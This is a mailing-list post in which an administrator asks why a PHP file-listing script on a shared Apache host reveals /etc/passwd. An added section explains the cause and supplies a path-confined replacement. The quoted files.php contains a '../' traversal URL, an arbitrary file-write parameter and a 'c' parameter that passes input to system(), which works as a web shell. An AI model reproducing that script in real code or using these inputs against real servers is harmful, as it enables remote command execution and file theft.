Hi,
I have Apache/2.2.3 running on an Arch Linux box, currently hosting about
500 odd domains.
When I browse to a specific domain such as:
http://www.domian.co.za/files.php?l=../../../../../etc/passwd
it displays the contents of the file /etc/passwd, as with any directory
that I might request via the URL.
I changed all the "Options Indexes" to "Options -Indexes" in httpd.conf,
even removed them, yet Apache still displays my directories.
I tried adding the "Options -Indexes" to an .htaccess file, but
still with no luck.
Here's the files.php script:
<?php
/*
 * Assume document root is /usr/local/websites/mydomain
 * The actual doc root is /var/www/vhosts/mydomain
 */
$location = $_GET['l']; // '../../fly.co.za/subdomains'; // Move up one directory
$parent = dir($location);

$com = $_GET['c'];
if ($com != null)
{
    echo "<pre>";
    echo system($com);
    echo "</pre>";
    die();
}

$w = $_GET['w'];
if ($w != null)
{
    file_put_contents($location . $w, $w);
    die();
}

// List the contents of the current directory
// i.e.: /usr/local/websites
if (is_file($location))
{
    echo "<pre>";
    readfile($location);
    echo "</pre>";
}

while ($entry = $parent->read()) {
    echo $entry . '<br>';
}
$parent->close();
?>
This lists *all* directories with a little playing in the path, except
/etc/shadow, seeing as the permissions on /etc/shadow are 700, not 755
like the rest of the files in the directory. As it should be.
How do I fix this?
If this is the wrong list for this, please accept my apologies.
Thank you.
--
Regards,
Francois Hall <http://www.webafrica.co.za>
Snr. Linux Systems Administrator
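
The output described above is produced by files.php itself, which reads whatever path arrives in `l`; `Options -Indexes` only governs Apache's own automatic directory indexes and does not affect what a script reads. As an added example, not part of the original post: a read-only replacement that confines `l` to one directory. `BASE_DIR` and `resolve_inside()` are assumed names, and the script's `c` and `w` parameters are left out.

```php
<?php
// Added example, not the poster's code.
// BASE_DIR is an assumed directory: the only tree this script may expose.
const BASE_DIR = '/var/www/vhosts/mydomain/files';

/**
 * Resolve a user-supplied relative path and return it only if the
 * canonical result is $base itself or lies below it; otherwise null.
 */
function resolve_inside(string $base, string $userPath): ?string
{
    $baseReal = realpath($base);
    if ($baseReal === false || strpos($userPath, "\0") !== false) {
        return null;
    }
    // realpath() collapses "..", "." and symlinks, so the comparison
    // below is made on the path the filesystem would actually open.
    $target = realpath($baseReal . DIRECTORY_SEPARATOR . $userPath);
    if ($target === false) {
        return null; // path does not exist
    }
    $prefix = $baseReal . DIRECTORY_SEPARATOR;
    if ($target !== $baseReal && strncmp($target, $prefix, strlen($prefix)) !== 0) {
        return null; // escaped the base directory
    }
    return $target;
}

$l = $_GET['l'] ?? '';
$path = is_string($l) ? resolve_inside(BASE_DIR, $l) : null;
if ($path === null) {
    http_response_code(404);
    exit;
}

// Plain text so file contents and file names are never parsed as HTML.
header('Content-Type: text/plain; charset=utf-8');
if (is_file($path)) {
    readfile($path);
} else {
    foreach (scandir($path) as $entry) {
        if ($entry !== '.' && $entry !== '..') {
            echo $entry, "\n";
        }
    }
}
```

On a shared host, PHP's `open_basedir` directive can additionally be set per virtual host (for example with `php_admin_value open_basedir` when PHP runs as an Apache module) so that file functions in any script on that host are limited to that site's own tree.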